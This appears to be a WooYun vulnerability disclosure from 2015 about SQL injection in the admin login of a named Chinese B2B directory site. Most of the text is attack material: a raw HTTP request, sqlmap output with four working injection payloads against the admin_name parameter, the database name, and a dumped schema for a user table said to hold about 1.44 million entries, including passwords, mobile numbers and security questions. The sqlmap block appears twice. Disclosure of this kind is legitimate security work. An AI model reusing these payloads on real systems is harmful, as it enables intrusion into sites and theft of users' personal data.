2015-07-01: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开
B2B电子商务网主站SQL注入导致100W用户账号/密码/联系方式/身份证号泄露
注入:POST /login.do HTTP/1.1Host: admin.huangye88.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://admin.huangye88.com/Cookie: PHPSESSID=rllpo5ncmo2rl8gk4fti93ie46; formhash=58e4af81Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 80formhash=58e4af81&admin_name=admin&admin_pwd=admin&from=&submit.x=16&submit.y=19
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: admin_name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: formhash=58e4af81&admin_name=admin' RLIKE (SELECT (CASE WHEN (1586=1586) THEN 0x61646d696e ELSE 0x28 END)) AND 'PPum'='PPum&admin_pwd=admin&from=&submit.x=16&submit.y=19 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: formhash=58e4af81&admin_name=admin' AND (SELECT 5715 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(5715=5715,1))),0x7178767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DqoY'='DqoY&admin_pwd=admin&from=&submit.x=16&submit.y=19 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: formhash=58e4af81&admin_name=admin' OR SLEEP(5)#&admin_pwd=admin&from=&submit.x=16&submit.y=19 Type: UNION query Title: Generic UNION query (NULL) - 39 columns Payload: formhash=58e4af81&admin_name=-2857' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171786b71,0x7a6e66426a5561447848,0x7178767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &admin_pwd=admin&from=&submit.x=16&submit.y=19---web application technology: PHP 5.4.30back-end DBMS: MySQL 5.0current database: 'hy_web'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: admin_name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: formhash=58e4af81&admin_name=admin' RLIKE (SELECT (CASE WHEN (1586=1586) THEN 0x61646d696e ELSE 0x28 END)) AND 'PPum'='PPum&admin_pwd=admin&from=&submit.x=16&submit.y=19 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: formhash=58e4af81&admin_name=admin' AND (SELECT 5715 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(5715=5715,1))),0x7178767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DqoY'='DqoY&admin_pwd=admin&from=&submit.x=16&submit.y=19 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: formhash=58e4af81&admin_name=admin' OR SLEEP(5)#&admin_pwd=admin&from=&submit.x=16&submit.y=19 Type: UNION query Title: Generic UNION query (NULL) - 39 columns Payload: formhash=58e4af81&admin_name=-2857' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171786b71,0x7a6e66426a5561447848,0x7178767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &admin_pwd=admin&from=&submit.x=16&submit.y=19---web application technology: PHP 5.4.30back-end DBMS: MySQL 5.0Database: hy_webTable: hy_user[39 columns]+-----------------------+------------------+| Column | Type |+-----------------------+------------------+| android_clientid | varchar(128) || ban_expire | int(11) || chengxinzhi | int(11) || emailauthen | int(11) || fromse | int(11) || id | int(11) || inviter | int(11) || ios_clientid | varchar(128) || ismoderator | tinyint(1) || isweixin | tinyint(1) || items | int(11) || jifen | int(11) || jingyan | mediumint(9) || logindays_continuous | smallint(6) || mqq | varchar(50) || mwx | varchar(50) || new_system_notes | varchar(255) || qq | varchar(50) || qqweibo | varchar(200) || ses | varchar(50) || sinaweibo | varchar(200) || user_answer | varchar(200) || user_createtime | timestamp || user_email | varchar(50) || user_from | varchar(255) || user_group | int(10) || user_lastloginip | varchar(26) || user_lastlogintime | int(10) || user_logintimes | int(11) || user_logintimes_daily | smallint(6) || user_mobile | varchar(32) || user_name | varchar(100) || user_password | varchar(100) || user_purview | text || user_question | varchar(200) || user_state | tinyint(2) || weixin | varchar(32) || weixin_ctime | int(10) unsigned || wx | varchar(50) |+-----------------------+------------------+Database: hy_web+---------+---------+| Table | Entries |+---------+---------+| hy_user | 1442375 |+---------+---------+
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
